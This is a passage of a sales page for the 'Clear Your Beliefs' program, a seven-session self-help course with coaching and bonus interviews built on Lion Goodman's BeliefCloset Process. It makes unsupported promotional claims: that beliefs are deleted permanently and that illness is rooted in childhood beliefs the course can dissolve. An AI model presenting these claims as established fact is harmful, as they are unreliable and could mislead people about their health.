did I say that?\r\nWhat’s wrong with me?\r\nWhy didn’t I follow through?\r\nWhy did I react that way?\r\nWhat the hell just happened?\r\n\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n\r\n<strong>Affirmations</strong> are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.\r\n<strong>That Belief Isn''t True.</strong>  Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.\r\n<strong>Tap Your Problem Away. </strong> Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.\r\n\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n\r\n<strong><strong><strong>First: It’s not your fault. There''s nothing wrong with you.</strong></strong></strong>\r\n<strong>Second: You can change your beliefs <em>permanently</em>.</strong>\r\n\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n\r\n<p>You''re no longer held back by old beliefs and stories.</p>\r\n<p>There''s no resistance to doing what needs to be done.</p>\r\n<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\r\n\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.\r\n\r\nNo technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.\r\n\r\nDuring the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n\r\nEliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.\r\nRemove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.\r\nGive you the power to change your experiences – and your circumstances – at will.\r\nShow you how to gain mastery over your moods, perceptions, and responses.\r\n\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n\r\nIf you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.\r\n\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n\r\nManifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a>\r\nRemove resistance and barriers\r\nOpen doors to new opportunities\r\nEliminate pain and suffering from the past\r\nExperience more fulfillment in your relationships\r\nAttract more abundance and prosperity\r\nIncrease your energy, vitality, and productivity\r\n\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n\r\n&nbsp;\r\n\r\n<h1>A Message from Lion Goodman...</h1>\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>\r\nDear Explorer:\r\nAs a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px;margin-bottom: 5px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs...\r\n\r\nIn gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.\r\n\r\n&nbsp;\r\n\r\n<h5>Session 1:   <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.\r\n\r\nIn this first session, you’ll examine your old beliefs, and determine which ones no longer serve you.  It’s time to discard them and clear some space!  You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n<strong> In Session 1, you will:</strong>\r\n\r\nDiscover old limiting beliefs that are deeply buried in your subconscious mind\r\nLearn which ones keep you stuck, preventing you from having what you want in life\r\nExperience a process that returns you to your True Self, the home of inner joy and bliss\r\nBegin to work with, not against, your subconscious mind – where your beliefs reside\r\n\r\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n<h5>Session 2:   <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.\r\n\r\nWhat do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It’s time to haul them out, and toss them out! You don’t need them anymore.  If you hear critical inner voices berating you, don’t miss this session.  Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n<strong> In Session 2, you will:</strong>\r\n\r\nUse the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself\r\nClear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again\r\nSee your own magnificence through a new clear lens of your own beauty and joy\r\n\r\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n<h5>Session 3:  <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\r\n\r\n<em>What are you capable of?  </em>If your answer is “Anything...” you don’t need this session.  But most of us think too small...\r\n\r\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>“What’s the use?  You’ll fail anyway. You don’t deserve happiness – look at you!”  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\r\n\r\nDo you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!\r\n\r\n<strong> In Session 3, you will:</strong>\r\n\r\nIdentify old beliefs that stand between you and creating the life you want\r\nDissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.\r\nImagine what it means to live without self-imposed limitations, trusting that you can create anything you want\r\n\r\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n<h5>Session 4:   <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.\r\n\r\nIf you’re married, are you happy and secure?   Or are you anxious about the future?   If you’re not in a relationship, what’s holding you back from finding your ideal mate?\r\n\r\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned “what love is” from your parents – so it’s no wonder that you’re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n&nbsp;\r\n\r\n<strong> In Session 4, you will:</strong>\r\n\r\nLook deeply into the childhood patterns that enabled you to survive and thrive\r\nSee which of your beliefs now interfere with your intimate relationships\r\nDiscover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions\r\n\r\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n<h5>Session 5:   <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy?   Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\r\n\r\n<strong> In Session 5, you will:</strong>\r\n\r\nExamine your family and cultural beliefs about money, work, poverty and “deservingness.”\r\nRemove beliefs that create stumbling blocks in the way of natural abundance\r\nCreate new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve\r\nLearn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them\r\n\r\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n<h5>Session 6:   <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\r\n\r\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\r\n\r\n<strong> In Session 6, you will:</strong>\r\n\r\nIdentify old beliefs that stand between you and vibrant health\r\nRecognize beliefs that make you vulnerable to disease and injury\r\nDissolve old beliefs at the root of illness, bad habits and lifestyle stress\r\nImagine the healthy, vibrant body you want, and create it consciously with new beliefs\r\n\r\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n<h5>Session 7:   <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n<strong> In Session 7, you will:</strong>\r\n\r\nScan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live\r\nLearn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life\r\nFind your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are\r\n\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n\r\nBonus #1:  <strong>Love:  What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong>\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can’t seem to stop hurting each other. What’s going on?\r\n\r\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\r\n\r\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\r\n\r\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\r\n<strong>\r\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\r\n\r\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\nBonus #2 <strong>- The LoveStyle Profile Quiz </strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\r\n\r\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\nBonus #3: <strong> The Spiritual Technology of Manifesting\r\nGuest Faculty: Anodea Judith, Ph.D. </strong>\r\n\r\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\r\n\r\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You’ll receive the first two chapters of the book as Bonus #4, below.\r\n\r\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\nBonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong>\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n\r\nBe called to awaken your already-powerful ability to create the life of your dreams\r\nLearn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)\r\nUnderstand the 7 chakras as stepping stones along the path of the manifestation process\r\nGain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life\r\nLearn a process that can strengthen your power of intention\r\n\r\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\nBonus #5:<strong> Change Your Beliefs eBook</strong>\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>”\r\n\r\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior.\r\n\r\nIt’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\nBonus #6: <strong>Complete Transcripts of the Course</strong>\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n&nbsp;\r\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\r\n\r\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\r\n\r\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\r\n\r\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they’ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\r\n<a name="package"></a>\r\n<p style="text-align: right"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\r\n&nbsp;\r\n\r\n<h1>Purchase Today and You’ll Receive:</h1>\r\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\r\n<h3 style="font-size: 20px">Plus: <em>The Entire BONUS Collection:</em></h3>\r\n\r\n<strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\r\n<em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\r\nYour Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong>\r\n<strong><em>Creating On Purpose: The 